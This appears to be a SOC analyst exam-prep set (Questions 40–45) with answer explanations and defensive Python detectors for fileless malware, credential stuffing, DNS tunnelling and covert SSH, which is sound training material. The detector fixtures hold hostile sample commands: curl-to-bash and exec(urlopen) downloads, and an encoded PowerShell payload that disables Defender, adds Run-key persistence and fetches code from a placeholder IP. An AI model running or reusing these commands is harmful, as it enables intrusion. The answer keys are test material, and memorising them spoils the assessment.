A) Routine software installation; allow execution.
B) Fileless malware using memory-based execution; isolate the server, perform memory forensics, and analyze scripts.
C) Misconfigured automation script; update script repository.
D) Legitimate patching process; verify with the system administrator.

Answer: B)

Explanation:

Option A assumes routine software installation. Legitimate installation processes typically involve signed binaries, trusted sources, and persistent disk artifacts. Execution directly in memory from untrusted sources is suspicious and inconsistent with standard IT procedures. Ignoring it could allow malware to maintain persistence and evade detection.

Option B is correct. Fileless malware runs in memory to bypass disk-oriented endpoint security and leaves minimal disk traces. The indicators here are scripts fetching content from untrusted sources and executing it without writing to disk; the absence of endpoint alerts shows that the activity evaded the existing controls, not that it is benign. Immediate action is to isolate the server to prevent lateral movement and data exfiltration, then acquire memory before any reboot, since a reboot destroys the only copy of an in-memory payload. Memory forensics captures running processes, injected code, and runtime payloads. Analyzing the scripts identifies the malicious behavior, payload characteristics, and any persistence mechanism (for example a cron entry or modified startup script that re-fetches the payload). Threat intelligence can then place the sample in a malware family or campaign. Remediation includes rebuilding or cleaning the affected server, updating detection rules, and hunting for the same download-and-execute pattern on other servers.

Option C suggests misconfigured automation scripts. While misconfigurations can lead to unexpected script execution, downloading untrusted files and executing in memory is highly unusual and indicative of malicious activity. Assuming this explanation risks missing an active compromise.

Option D proposes a legitimate patching process. Patching processes are documented, signed, and predictable. Fileless execution of untrusted downloads without alerts is not consistent with standard patch management.

Selecting option B prioritizes containment, forensic investigation, and mitigation of advanced threats. Early isolation and analysis prevent further compromise and enable detection of similar attacks across the network.

Question 41

An analyst identifies repeated failed authentication attempts on cloud-based accounts originating from IP addresses in multiple countries. The accounts targeted include privileged roles. What is the most likely threat, and what is the recommended response?

A) User mistyped credentials; notify users.
B) Credential-stuffing attacks targeting cloud accounts; block offending IPs, enable MFA, and review logs for successful logins.
C) Normal login retries from mobile devices; allow activity.
D) Cloud service misconfiguration; update account settings.

Answer: B)

Explanation:

Option A suggests user errors. While users may occasionally mistype credentials, the volume, global IP distribution, and targeting of privileged accounts indicate deliberate malicious activity rather than routine mistakes. Ignoring this would risk account compromise.

Option B is correct. Credential stuffing replays username and password pairs leaked in earlier breaches against other services, relying on password reuse; the source IPs are spread across many countries because attackers route attempts through proxies or botnets to evade per-IP rate limiting. Targeting privileged roles amplifies the risk because a single success yields administrative access. Immediate response involves blocking the offending IP addresses, enforcing multi-factor authentication, and, most importantly, reviewing the logs for any successful authentication from the same sources, since a success amid the failures marks a compromised account whose sessions must be revoked and credentials reset. Threat intelligence feeds can identify the attacker infrastructure. Analysts should also enforce strong password policies, screen new passwords against known-breached lists, and review account activity for anomalies. IP blocking is a short-lived control because the attacker will rotate sources; MFA and conditional access are the durable ones. This approach mitigates account compromise risk while preserving evidence for investigation.

Option C assumes normal mobile retries. Legitimate retries are limited in scope, originate from known devices or geographies, and rarely target multiple privileged accounts simultaneously. Treating this activity as normal ignores the threat.

Option D proposes cloud misconfiguration. Misconfiguration does not produce repeated failed authentication attempts from global IPs. Assuming misconfiguration alone fails to address active attacks.

Selecting option B ensures the timely mitigation of credential-based attacks, safeguards privileged accounts, and prevents unauthorized access to sensitive cloud resources.
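Triage logic for the scenario in Question 41, as an added example rather than code from the original page. It assumes a constructed sign-in log format (timestamp, user, source IP, country, result) and a constructed set of privileged accounts; the thresholds and field names are this example's own. It applies the check the answer calls for (look for a success among the failures) and treats a single user retrying from one known IP as benign.

```python
"""Triage of cloud sign-in logs for credential-stuffing patterns.

Added example; it is not part of the original question set. It assumes a
constructed one-event-per-line log format:
    timestamp,user,source_ip,country,result
and a constructed set of accounts known to hold privileged roles.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample: a distributed failure burst against an admin account
# followed by one success from an attacker IP, the same IPs failing against a
# second privileged account, and an ordinary user retrying from one known IP.
SAMPLE_LOG = """\
2024-05-01T02:00:01Z,admin@corp.example,198.51.100.7,BR,FAIL
2024-05-01T02:00:04Z,admin@corp.example,203.0.113.9,VN,FAIL
2024-05-01T02:00:09Z,admin@corp.example,192.0.2.44,RU,FAIL
2024-05-01T02:00:15Z,admin@corp.example,198.51.100.21,NG,FAIL
2024-05-01T02:00:22Z,admin@corp.example,203.0.113.9,VN,SUCCESS
2024-05-01T02:01:03Z,billing@corp.example,198.51.100.7,BR,FAIL
2024-05-01T02:01:07Z,billing@corp.example,192.0.2.44,RU,FAIL
2024-05-01T08:30:00Z,jdoe@corp.example,10.0.0.5,US,FAIL
2024-05-01T08:30:20Z,jdoe@corp.example,10.0.0.5,US,SUCCESS
"""
PRIVILEGED = {"admin@corp.example", "billing@corp.example"}  # constructed


def parse(log_text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in log_text.splitlines():
        ts, user, ip, country, result = line.split(",")
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user, "ip": ip, "country": country,
                       "result": result})
    return events


def analyze(events, min_failures=3, min_countries=2):
    """Return per-account findings for accounts that look targeted.

    An account is reported when its failures are numerous and geographically
    spread, or when an IP that failed against it also failed against other
    accounts (the same credential list replayed across users). A success from
    an attack IP is only reported for accounts already under attack, so a
    single user retrying a mistyped password from one IP is not flagged.
    """
    by_user = defaultdict(list)
    ip_accounts = defaultdict(set)  # failing IP -> accounts it failed against
    for e in events:
        by_user[e["user"]].append(e)
        if e["result"] == "FAIL":
            ip_accounts[e["ip"]].add(e["user"])

    findings = {}
    for user, evs in by_user.items():
        fails = [e for e in evs if e["result"] == "FAIL"]
        fail_ips = {e["ip"] for e in fails}
        countries = {e["country"] for e in fails}
        shared_ips = sorted(ip for ip in fail_ips if len(ip_accounts[ip]) > 1)
        spread = len(fails) >= min_failures and len(countries) >= min_countries
        if not (spread or shared_ips):
            continue
        success_ips = [e["ip"] for e in evs
                       if e["result"] == "SUCCESS" and e["ip"] in fail_ips]
        findings[user] = {
            "failures": len(fails),
            "countries": sorted(countries),
            "privileged": user in PRIVILEGED,
            "attack_ips": sorted(fail_ips),
            "shared_attack_ips": shared_ips,
            "success_after_failure": success_ips,
        }
    return findings


def block_list(findings):
    """IPs to block first: every failing IP tied to a flagged account."""
    return sorted({ip for f in findings.values() for ip in f["attack_ips"]})


if __name__ == "__main__":
    found = analyze(parse(SAMPLE_LOG))
    for user, f in found.items():
        print(user, f)
    print("block:", block_list(found))
```

Any account with a non-empty success_after_failure entry is treated as compromised: revoke its sessions and reset its credentials before anything else. The block list is a stop-gap, since a stuffing campaign will move to fresh proxy addresses; MFA enforcement is what actually closes the attack.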

Question 42

A SOC analyst observes multiple Windows endpoints executing PowerShell scripts that modify registry keys and disable security services. Scripts are obfuscated and connect to external IPs over TCP 8080. Antivirus has not detected the activity. What is the most likely threat, and what is the immediate response?

A) Legitimate administrative scripts; allow execution.
B) Fileless malware using PowerShell to maintain persistence and C2 connectivity; isolate endpoints, capture memory, and analyze scripts.
C) System monitoring misconfiguration; update configurations.
D) User-initiated automation scripts; notify users.

Answer: B)

Explanation:

Option A suggests legitimate scripts. Administrative scripts are normally documented, signed, and follow predictable behavior. Obfuscation, registry modification, and disabling security services indicate malicious intent. Allowing this could lead to persistent compromise and data exfiltration.

Option B is correct. Fileless malware leveraging PowerShell avoids disk artifacts, making detection difficult. Registry modifications suggest persistence attempts, and connections to external IPs indicate command-and-control activity. Immediate response involves isolating endpoints to prevent lateral spread, capturing memory to analyze in-memory execution, and analyzing scripts to understand malware behavior and external communications. Endpoint telemetry review helps determine the scope and identify other affected systems. Remediation involves removing malware, restoring security services, and updating detection rules. Capturing evidence allows forensic and threat intelligence analysis.

Option C suggests monitoring misconfiguration. Misconfigurations do not explain obfuscated scripts, registry changes, or external connections, making this explanation unlikely.

Option D proposes user-initiated automation. Legitimate user scripts rarely disable security services or connect to unknown IPs. Assuming benign behavior could allow malware persistence.

Choosing option B ensures containment, forensic capture, and remediation, preventing further compromise while understanding attack methodology.
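The download-and-execute-in-memory patterns from Question 40 (Linux) and the obfuscated PowerShell activity from Question 42 can both be surfaced from process command-line telemetry. The script below is an added example, not code from the original page: it assumes a constructed feed of (host, command line) pairs such as an EDR or auditd execve export would give, decodes PowerShell -EncodedCommand payloads (base64 of UTF-16LE) so the real script is what gets inspected, and scores each command line against indicator patterns whose names and thresholds are this example's own.

```python
"""Command-line triage for the in-memory execution patterns in Questions 40 and 42.

Added example, not code from the original page. It assumes a constructed
process-telemetry feed of (host, command_line) pairs, such as an EDR or
auditd execve export would provide. The indicator names are this example's own.
"""
import base64
import re

# PowerShell -EncodedCommand / -enc / -e / -ec takes base64 of a UTF-16LE script.
_ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# (indicator name, pattern). Matched case-insensitively against the command
# line (with any base64 blob removed) plus the decoded script, if present.
INDICATORS = [
    ("download_piped_to_shell",
     r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b"),
    ("process_substitution_download", r"\b(?:ba)?sh\s+<\(\s*(?:curl|wget)\b"),
    ("python_exec_from_url", r"\bexec\(.*urlopen\("),
    ("powershell_download_cradle",
     r"(?:Net\.WebClient|Invoke-WebRequest|DownloadString|\bIEX\b|Invoke-Expression)"),
    ("defender_tamper",
     r"(?:Set-MpPreference\s+-Disable|DisableAntiSpyware|DisableRealtimeMonitoring)"),
    ("service_stop",
     r"(?:Stop-Service|\bsc(?:\.exe)?\s+stop|Set-Service\b.*-StartupType\s+Disabled)"),
    ("run_key_persistence", r"CurrentVersion\\Run\b"),
    ("external_8080", r"\b(?:\d{1,3}\.){3}\d{1,3}:8080\b"),
]


def decode_encoded_command(cmdline):
    """Return the decoded script for a -EncodedCommand invocation, else None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Score each (host, command_line) pair; returns one finding per event."""
    results = []
    for host, cmdline in events:
        decoded = decode_encoded_command(cmdline)
        scan_text = cmdline
        hits = []
        if decoded is not None:
            # Drop the base64 blob so it cannot produce spurious matches, and
            # scan the decoded script instead.
            scan_text = _ENC_RE.sub("-enc <base64>", cmdline) + "\n" + decoded
            hits.append("encoded_command")
        hits += [name for name, rx in INDICATORS
                 if re.search(rx, scan_text, re.I | re.S)]
        results.append({"host": host, "hits": hits, "decoded": decoded})
    return results


# Constructed PowerShell payload, encoded the way an attacker would pass it.
_PS_SCRIPT = (
    "Set-MpPreference -DisableRealtimeMonitoring $true; "
    "Stop-Service WinDefend; "
    "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name upd -Value 'powershell -w hidden'; "
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23:8080/a')"
)
_ENC = base64.b64encode(_PS_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed telemetry: three in-memory execution cases and two benign ones.
SAMPLE_EVENTS = [
    ("web01", "curl -s http://203.0.113.50/s.sh | bash"),
    ("db02", "python3 -c \"import urllib.request as u;"
             "exec(u.urlopen('http://203.0.113.50/p.py').read())\""),
    ("ws07", f"powershell.exe -nop -w hidden -enc {_ENC}"),
    ("build03", "apt-get install -y nginx"),
    ("ws09", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], finding["hits"])
```

Two complements worth pairing with this: on Linux, a process whose /proc/PID/exe link reads "(deleted)" or "memfd:" is executing code that no longer exists on disk, which is the strongest in-memory indicator; on Windows, PowerShell Script Block Logging (Event ID 4104) records the decoded script regardless of how it was obfuscated on the command line, so the decode step above is only needed for telemetry that lacks it.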

Question 43

During a threat-hunting exercise, analysts detect unusual SMB traffic from multiple endpoints to rarely accessed network shares. The activity includes reading small portions of files and attempting unauthorized writes. What is the most likely threat, and what immediate action should be taken?

A) Normal backup traffic; allow.
B) Lateral movement or internal reconnaissance by malware; isolate endpoints, review access logs, and analyze affected hosts.
C) Misconfigured scheduled tasks; correct schedules.
D) Legitimate off-hours user activity; notify users.

Answer: B)

Explanation:

Option A assumes backup traffic. Backup jobs typically read entire files, run at scheduled times, and use known service accounts. Reading small portions of many files combined with unauthorized write attempts is inconsistent with backup behavior. Allowing this could facilitate malware propagation.

Option B is correct. Malware performing lateral movement often targets network shares, reads file contents for reconnaissance, and attempts unauthorized writes to test permissions or propagate. Immediate response involves isolating affected endpoints, analyzing network and file access logs, identifying compromised accounts, and performing endpoint forensics. Containment prevents further compromise and preserves evidence for investigation. Analysts can then remediate affected systems, update monitoring rules, and validate user account integrity.

Option C suggests misconfigured scheduled tasks. Such tasks usually follow predictable behavior and affect limited endpoints. Observing multiple endpoints with unauthorized activity is unlikely to be caused by misconfiguration alone.

Option D posits legitimate off-hours user activity. Off-hour use of rarely accessed shares with unauthorized writes is unusual and requires investigation. Assuming legitimacy risks undetected malware activity.

Selecting option B allows timely containment, forensic investigation, and remediation of lateral movement attempts while minimizing network risk.
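A threat hunt of the kind in Question 43 is most useful when it compares the suspicious window against a baseline of normal share usage. The script below is an added example, not code from the original page: it assumes a constructed file-share audit format (timestamp, source host, account, share, READ or WRITE, GRANTED or DENIED), learns which shares each host normally touches and which hosts each account normally works from, and then flags hosts that step outside that baseline while getting writes denied, or that use an account never seen there before. Byte-level detail (the "small portions of files" in the question) is not in this format, so the rule keys on share coverage and denied writes.

```python
"""Baseline-versus-hunt comparison for the share-access activity in Question 43.

Added example, not from the original page. It assumes a constructed
file-share audit format, one record per line:
    timestamp,src_host,account,share,access,result
with access READ or WRITE and result GRANTED or DENIED.
"""
from collections import defaultdict

# Constructed baseline period: who normally touches which share, from where.
BASELINE_LOG = """\
2024-04-03T09:12:00Z,ws01,alice,finance,READ,GRANTED
2024-04-04T10:05:00Z,ws01,alice,finance,WRITE,GRANTED
2024-04-05T11:40:00Z,ws02,bob,eng,READ,GRANTED
2024-04-10T13:02:00Z,ws02,bob,eng,WRITE,GRANTED
2024-04-12T23:30:00Z,bkp01,svc_backup,finance,READ,GRANTED
2024-04-12T23:31:00Z,bkp01,svc_backup,eng,READ,GRANTED
2024-04-12T23:32:00Z,bkp01,svc_backup,legacy,READ,GRANTED
"""
# Constructed hunt window: ws02 walks rarely used shares and probes writes,
# bob's account appears from a new host, alice and the backup job are normal.
HUNT_LOG = """\
2024-05-02T02:10:00Z,ws02,bob,legacy,READ,GRANTED
2024-05-02T02:10:05Z,ws02,bob,legacy,WRITE,DENIED
2024-05-02T02:10:09Z,ws02,bob,hr,READ,GRANTED
2024-05-02T02:10:12Z,ws02,bob,hr,WRITE,DENIED
2024-05-02T02:11:00Z,ws05,bob,finance,READ,GRANTED
2024-05-02T02:11:04Z,ws05,bob,finance,WRITE,DENIED
2024-05-02T09:00:00Z,ws01,alice,finance,WRITE,GRANTED
2024-05-02T23:00:00Z,bkp01,svc_backup,finance,READ,GRANTED
"""


def parse(text):
    """Parse the constructed audit format into a list of record dicts."""
    fields = ("ts", "host", "account", "share", "access", "result")
    return [dict(zip(fields, line.split(","))) for line in text.splitlines()]


def build_baseline(events):
    """Learn (host -> shares) and (account -> hosts) seen during normal operations."""
    host_shares = defaultdict(set)
    account_hosts = defaultdict(set)
    for e in events:
        host_shares[e["host"]].add(e["share"])
        account_hosts[e["account"]].add(e["host"])
    return {"host_shares": host_shares, "account_hosts": account_hosts}


def hunt(events, baseline):
    """Flag hosts touching shares outside their baseline with writes denied,
    or from which an account never seen there before is being used."""
    per_host = defaultdict(lambda: {"new_shares": set(), "denied_writes": 0,
                                    "accounts_from_new_host": set()})
    for e in events:
        h = per_host[e["host"]]
        if e["share"] not in baseline["host_shares"][e["host"]]:
            h["new_shares"].add(e["share"])
        if e["access"] == "WRITE" and e["result"] == "DENIED":
            h["denied_writes"] += 1
        if e["host"] not in baseline["account_hosts"][e["account"]]:
            h["accounts_from_new_host"].add(e["account"])
    findings = {}
    for host, h in per_host.items():
        if (h["new_shares"] and h["denied_writes"]) or h["accounts_from_new_host"]:
            findings[host] = {
                "new_shares": sorted(h["new_shares"]),
                "denied_writes": h["denied_writes"],
                "accounts_from_new_host": sorted(h["accounts_from_new_host"]),
            }
    return findings


if __name__ == "__main__":
    baseline = build_baseline(parse(BASELINE_LOG))
    for host, f in hunt(parse(HUNT_LOG), baseline).items():
        print(host, f)
```

The account-from-new-host signal is the one to act on first: bob's credentials being used from ws05, a host he has never worked from, is the classic sign that the account itself is compromised and is now the vehicle for lateral movement, so the account is reset and both hosts are isolated together.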

Question 44

A SOC analyst identifies endpoints sending frequent DNS queries with large subdomains to external resolvers. The responses contain encoded payloads, and the queries occur during non-business hours. What is the likely cause, and what should the SOC do first?

A) Normal DNS traffic; ignore.
B) DNS tunneling used for covert exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured internal DNS server; update configuration.
D) Antivirus cloud updates; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal DNS activity. Typical queries are short, predictable, and directed to known domains. Extremely long, encoded queries during off-hours are abnormal and indicate potential malicious activity. Ignoring them risks undetected exfiltration.

Option B is correct. DNS tunneling allows malware to send sensitive data over DNS, evading traditional monitoring. Large subdomains carrying encoded payloads and off-hour activity are consistent with exfiltration. Immediate steps include capturing DNS traffic, isolating affected hosts to prevent further exfiltration, and decoding payloads to assess data at risk. Endpoint analysis identifies the processes generating queries. Threat intelligence can reveal associated malicious domains. Containment, investigation, and remediation prevent further compromise and provide actionable evidence.

Option C suggests misconfigured DNS servers. Misconfigurations rarely produce persistent, encoded traffic to external resolvers. Treating this as a benign misconfiguration risks ongoing compromise.

Option D proposes antivirus updates. Antivirus DNS queries are generally predictable and directed at known domains, making this explanation unlikely.

Selecting option B ensures timely detection, containment, and forensic analysis of potential DNS-based exfiltration.
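Questions 39 and 44 describe the same DNS-tunneling signal: many distinct, long, high-entropy subdomains under one registered domain from one host, often as TXT or NULL queries and outside business hours. The script below is an added example, not code from the original page. It assumes a constructed resolver log (timestamp, source host, query name, query type), takes the registered domain to be the last two labels (production code should use the public suffix list), and treats 08:00 to 17:59 UTC as business hours; those are this example's assumptions, as are the thresholds.

```python
"""Detection logic for the DNS-tunneling scenarios in Questions 39 and 44.

Added example, not from the original page. It assumes a constructed resolver
log, one query per line:
    timestamp,src_host,qname,qtype
Registered domain = last two labels, and business hours = 08:00-17:59 UTC;
both are this example's assumptions.
"""
import math
from collections import Counter, defaultdict
from datetime import datetime

BUSINESS_HOURS = range(8, 18)  # assumption: 08:00-17:59 UTC

# Constructed log: four distinct high-entropy 40-character labels under one
# domain at 03:00 (tunnel-like), plus ordinary repeated lookups.
SAMPLE_DNS = """\
2024-05-03T03:12:01Z,ws11,a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0.data.exfil-example.net,TXT
2024-05-03T03:12:04Z,ws11,z9y8x7w6v5u4t3s2r1q0p9o8n7m6l5k4j3i2h1g0.data.exfil-example.net,TXT
2024-05-03T03:12:07Z,ws11,m1n2b3v4c5x6z7l8k9j0h1g2f3d4s5a6p7o8i9u0.data.exfil-example.net,TXT
2024-05-03T03:12:10Z,ws11,q1w2e3r4t5y6u7i8o9p0a1s2d3f4g5h6j7k8l9z0.data.exfil-example.net,TXT
2024-05-03T03:12:15Z,ws11,www.example.com,A
2024-05-03T10:00:00Z,ws12,cdn-assets.example.org,A
2024-05-03T10:00:30Z,ws12,cdn-assets.example.org,A
2024-05-03T10:01:00Z,ws12,v3.updates.av-example.com,A
2024-05-03T10:05:00Z,ws12,v3.updates.av-example.com,A
"""


def shannon_entropy(s):
    """Bits per character; encoded data scores well above ordinary hostnames."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain labels, registered domain) under the two-label assumption."""
    labels = qname.rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])


def parse_dns(text):
    """Parse the constructed resolver log into event dicts."""
    events = []
    for line in text.splitlines():
        ts, src, qname, qtype = line.split(",")
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "src": src, "qname": qname.lower(), "qtype": qtype})
    return events


def analyze_dns(events, min_unique=3, entropy_threshold=3.5, label_len_threshold=30):
    """Group by (source host, registered domain) and flag tunnel-like groups.

    A group is flagged when it has at least min_unique distinct subdomains and
    some label is either long or high-entropy. TXT/NULL use and off-hours
    timing are reported as supporting context rather than required.
    """
    groups = defaultdict(list)
    for e in events:
        sub, base = split_name(e["qname"])
        groups[(e["src"], base)].append((sub, e))
    findings = {}
    for key, items in groups.items():
        unique_subs = {".".join(sub) for sub, _ in items}
        if len(unique_subs) < min_unique:
            continue
        labels = [lab for sub in unique_subs for lab in sub.split(".") if lab]
        max_label_len = max((len(lab) for lab in labels), default=0)
        max_label_entropy = max((shannon_entropy(lab) for lab in labels), default=0.0)
        if max_label_entropy < entropy_threshold and max_label_len < label_len_threshold:
            continue
        findings[key] = {
            "queries": len(items),
            "unique_subdomains": len(unique_subs),
            "max_label_len": max_label_len,
            "max_label_entropy": round(max_label_entropy, 2),
            "txt_null": sum(1 for _, e in items if e["qtype"] in ("TXT", "NULL")),
            "off_hours": sum(1 for _, e in items if e["ts"].hour not in BUSINESS_HOURS),
        }
    return findings


if __name__ == "__main__":
    for key, f in analyze_dns(parse_dns(SAMPLE_DNS)).items():
        print(key, f)
```

Decoding the payload comes after this step, once the encoding is identified from the label alphabet (hex, base32 and base64 variants are the usual choices in tunneling tools). The counting of unique subdomains matters because a tunnel must vary the name to defeat caching, so a CDN hostname looked up a thousand times never trips the rule. Question 44 also mentions external resolvers: forcing all DNS through the corporate resolver and blocking direct outbound port 53 is what makes this log complete in the first place.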

Question 45

A SOC analyst observes multiple Linux servers establishing outbound SSH connections to unknown external hosts over non-standard ports. Traffic is low-volume but persistent. What is the most likely cause, and what is the recommended response?

A) Normal administrative remote access; allow.
B) Malicious SSH tunnels for data exfiltration or C2; capture traffic, isolate servers, and analyze connections.
C) Misconfigured automation scripts; update scripts.
D) Routine monitoring software; verify vendor sources.

Answer: B)

Explanation:

Option A assumes legitimate remote administration. Administrative SSH access typically uses the standard port, goes to or from known hosts such as a bastion, and happens during maintenance windows. Persistent low-volume connections to unknown hosts over non-standard ports suggest malicious activity rather than routine maintenance.

Option B is correct. Low-volume persistent SSH connections to unknown external hosts on non-standard ports are indicative of covert tunnels used for data exfiltration or command-and-control communication. Attackers often exploit SSH to evade detection. The SOC should capture network traffic for forensic analysis, isolate affected servers to prevent lateral movement or data loss, and identify the processes initiating the connections. Payload analysis can reveal exfiltrated data or C2 instructions. Threat intelligence can provide context regarding the external IPs and associated campaigns. Endpoint analysis uncovers persistence mechanisms, unauthorized accounts, or injected processes. Remediation includes terminating malicious connections, cleaning compromised servers, updating detection signatures, and monitoring the environment for similar activity.

Option C points to misconfigured automation scripts. Incorrectly written or deployed scripts can produce unintended behavior such as repeated task failures, error messages, or occasional unexpected network connections, but those patterns are predictable: repeated attempts to reach known endpoints, or traffic to internal or authorized systems, usually traceable to a recent script change, a parameter error, or a scheduling mistake, and accompanied by logs or errors that show where the script is failing.

The scenario described in the question goes beyond that. Non-standard ports, communication with unknown external hosts, and persistent low-volume traffic do not align with scripting errors. Misconfigured scripts rarely establish sustained, stealthy connections to unfamiliar external systems; non-standard ports are often chosen deliberately to evade monitoring or slip past firewall rules, and persistent low-volume traffic is a hallmark of covert command-and-control or exfiltration channels designed not to trigger alerts. Automation scripts also do not implement long-term persistence or obfuscate their actions across sessions, whereas malicious actors maintain stealthy connections, rotate ports, and avoid logging. Misconfigured scripts should still be ruled out during the investigation, but the combination of indicators here points to deliberate malicious behavior that requires forensic analysis and targeted mitigation.

Option D posits routine monitoring software. Monitoring agents typically use known domains and standard ports. The described activity suggests stealthy malicious activity rather than legitimate telemetry.

Choosing option B ensures containment, forensic capture, and remediation, preventing data exfiltration and attacker persistence.
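The "low-volume but persistent" pattern in Question 45 is a beaconing signature, and flow records are enough to score it without packet capture. The script below is an added example, not code from the original page. It assumes a constructed flow format with an application label from protocol detection (the kind of "service" field Zeek provides), one connection per line (timestamp, source host, destination IP, destination port, app, bytes), plus this example's own assumptions about internal address ranges and an approved bastion. A tuple is flagged when it is SSH to an external, unapproved host with enough connections to count as persistent, small sessions, and near-regular spacing.

```python
"""Flow-record triage for the persistent outbound SSH activity in Question 45.

Added example, not from the original page. It assumes a constructed flow
format with an application label from protocol detection, one connection
per line:
    timestamp,src_host,dst_ip,dst_port,app,bytes
The internal ranges and approved SSH destination are this example's assumptions.
"""
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime

# Assumption: the organisation's internal ranges are the RFC 1918 blocks.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
APPROVED_SSH_DESTINATIONS = {"198.51.100.5"}  # assumption: the managed bastion

# Constructed flows: srv01 beacons every ~5 minutes with ~1 KB per session to
# an unknown host on 2222; the others are internal, approved, non-SSH, or one-off.
SAMPLE_FLOWS = """\
2024-05-04T02:00:00Z,srv01,203.0.113.77,2222,ssh,1180
2024-05-04T02:05:02Z,srv01,203.0.113.77,2222,ssh,1204
2024-05-04T02:09:58Z,srv01,203.0.113.77,2222,ssh,1192
2024-05-04T02:15:01Z,srv01,203.0.113.77,2222,ssh,1210
2024-05-04T02:20:00Z,srv01,203.0.113.77,2222,ssh,1188
2024-05-04T02:24:59Z,srv01,203.0.113.77,2222,ssh,1199
2024-05-04T02:03:00Z,srv02,10.0.0.9,22,ssh,48211
2024-05-04T02:14:00Z,srv02,10.0.0.9,22,ssh,9920
2024-05-04T02:01:00Z,srv03,198.51.100.5,22,ssh,2200
2024-05-04T02:02:00Z,srv04,203.0.113.80,443,https,15000
2024-05-04T02:06:00Z,srv05,203.0.113.90,2200,ssh,380000
2024-05-04T03:40:00Z,srv05,203.0.113.90,2200,ssh,520000
"""


def is_internal(ip):
    """True if the address falls in one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Parse the constructed flow format into dicts."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, port, app, nbytes = line.split(",")
        flows.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
                      "dst": dst, "port": int(port), "app": app, "bytes": int(nbytes)})
    return flows


def analyze_flows(flows, min_connections=4, max_mean_bytes=10_000, max_interval_cv=0.2):
    """Flag (src, dst, port) tuples that look like covert SSH channels.

    Criteria: SSH to an external, unapproved host; at least min_connections
    (persistence); mean session size at most max_mean_bytes (low volume); and
    coefficient of variation of the inter-connection interval at most
    max_interval_cv (regular beaconing).
    """
    groups = defaultdict(list)
    for f in flows:
        groups[(f["src"], f["dst"], f["port"])].append(f)
    findings = {}
    for (src, dst, port), conns in groups.items():
        if conns[0]["app"] != "ssh" or is_internal(dst) or dst in APPROVED_SSH_DESTINATIONS:
            continue
        if len(conns) < min_connections:
            continue
        conns.sort(key=lambda f: f["ts"])
        intervals = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(conns, conns[1:])]
        mean_interval = statistics.mean(intervals)
        cv = statistics.pstdev(intervals) / mean_interval if mean_interval else 0.0
        mean_bytes = statistics.mean(f["bytes"] for f in conns)
        if mean_bytes > max_mean_bytes or cv > max_interval_cv:
            continue
        findings[(src, dst, port)] = {
            "connections": len(conns),
            "nonstandard_port": port != 22,
            "mean_interval_s": round(mean_interval, 1),
            "interval_cv": round(cv, 3),
            "mean_bytes": round(mean_bytes),
        }
    return findings


if __name__ == "__main__":
    for key, f in analyze_flows(parse_flows(SAMPLE_FLOWS)).items():
        print(key, f)
```

On the flagged server the next step is attribution: `ss -tnp` maps the live connection to its PID, and the owning binary and its parent process tell you whether a legitimate tool or an implant opened it. Beacons that add random jitter will push the interval CV above the threshold, so in practice pair this rule with a plain connections-per-day count to the same destination.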